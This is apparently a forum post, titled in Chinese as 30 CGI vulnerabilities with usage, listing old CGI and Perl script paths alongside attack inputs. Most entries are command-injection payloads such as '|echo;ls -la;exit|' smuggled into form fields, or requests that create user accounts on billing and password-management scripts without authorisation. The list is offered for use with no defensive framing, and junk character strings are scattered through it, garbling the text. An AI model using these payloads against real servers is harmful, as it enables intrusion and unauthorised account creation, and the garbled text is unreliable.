Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
/ e) j3 g& c. _( zusername=username&password=password
* B& y( I5 r0 w  S, p# w7 G. t
) |8 P$ ?) ~0 C# y, c4 z: j/index.cgi
wei=ren&gen=command

, }' d8 M& U* M0 B9 f6 j/passmaster.cgi
Action=Add&Username=Username&Password=Password
+ r0 D/ t1 X9 b
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
# o: g0 ]7 Z/ b4 k. G( k+ N- }
  D) i0 r- B* e9 m, q: z$ q/form.cgi
name=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
# @* a9 r2 J$ n, i$ W. f/cgi-bin/EuroDebit/addusr.pl
; L- A( l: h! buser=username&pass=Password&confirm=Password

/ccbill-local.asp
. X) s9 C* w" P# t6 M/ apost_values=username:password

/ ~! G2 h; I% J8 j$ t& \/count.cgi
2 U% n) I1 H; X0 X5 L2 @pinfile=|echo;ls -la;exit|

/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
, m6 q& C0 c4 G* ^3 uvercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|
/ t1 T0 x+ H( w& ^0 o, L  |+ p" A! b
4 v$ o+ Q7 t! n: G' o$ ]/modify.cgi
username=username&password=password&expire=30
+ S3 F  Q9 v7 o* P7 K$ S
/openjournal.cgi
6 y" j. y4 z6 x* eedit=1&ct=2&go=|echo;ls -al;exit|

/gx9passwd.cgi
9 L, w# ?; k/ j" Kcmd=ADD&user=username&pass=password
6 T! G5 i# R, W/ g
/probecontrol.cgi
command=enable&username=username&password=password

/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
, Q: d2 h% w8 h3 ]
/htadd.pl
configfile=|echo; ls -alt; exit
: G7 ]) ^' g8 c
" Q8 ~2 ~- z$ `. M, N/gx9passwd.cgi
; n; X- X- H5 W* ucmd=ADD&user=username&pass=password
( R( Q/ t" }; T5 o0 B$ K. B& `5 j
* c. g' A# S4 s# O/ W" x6 M/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
8 u/ B( h" w  {% y- k  Q
+ c, T6 p0 t0 K+ F, n9 y7 {/cpay.cgi
" w- j% W5 m( E7 K" jcommand=add_member&username=username(EMAIL)&password=password(DES)
" B8 Y5 h7 r, F/ ]5 L
, x% B3 j; k& _4 a, f5 P% A/globill_ut.cgi
$ F# C' G) h; z8 rdo=add&username=username&password=password&wpassword=password

5 W# ]3 ^8 z  n* ?/usercontrol.cgi
7 R. |, C, L( I7 g7 fcommand=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
/cgi-bin/mastergate/pincount.cgi
, T: K. G- ~: r% G1 {- Dpinfile=|echo;pwd;exit|

/accountcreate.cgi
3 G& S' A( x) N5 e/cgi-bin/gateway/accountcreate.cgi
/ i( F; L2 i# \8 @, D# N, x- pusername=username&password=password&password2=password&ref1=|echo;ls -al;exit
- j$ x4 H% n  K$ h3 S; T
9 M7 B. e; v  T# H4 q/ Y/af.cgi
0 W) @6 Y' C1 X* Z! ^, k: r/env.cgi
- A$ a- X/ J5 z: J- t, _4 {: NADD+;echo;pwd;exit

/count.cgi
' z0 R8 i' P2 N4 Q8 {* ~5 Jpinfile=|echo;pwd;exit|
; o5 j( W9 \; _% V! f" }0 |6 V
& \8 l. M* a& a/recon.cgi
) u8 e. r; d  m/ |" |# x* qsearchoption=1&searchfor=|echo;ls%20-al;exit|

/add.cgi
# i; w6 k3 O9 z6 V( @3 j/ Zusername=username&password=password&expire=30

; w' u2 N' |& `==============================
! k, t3 V6 G( V( u2 B( ~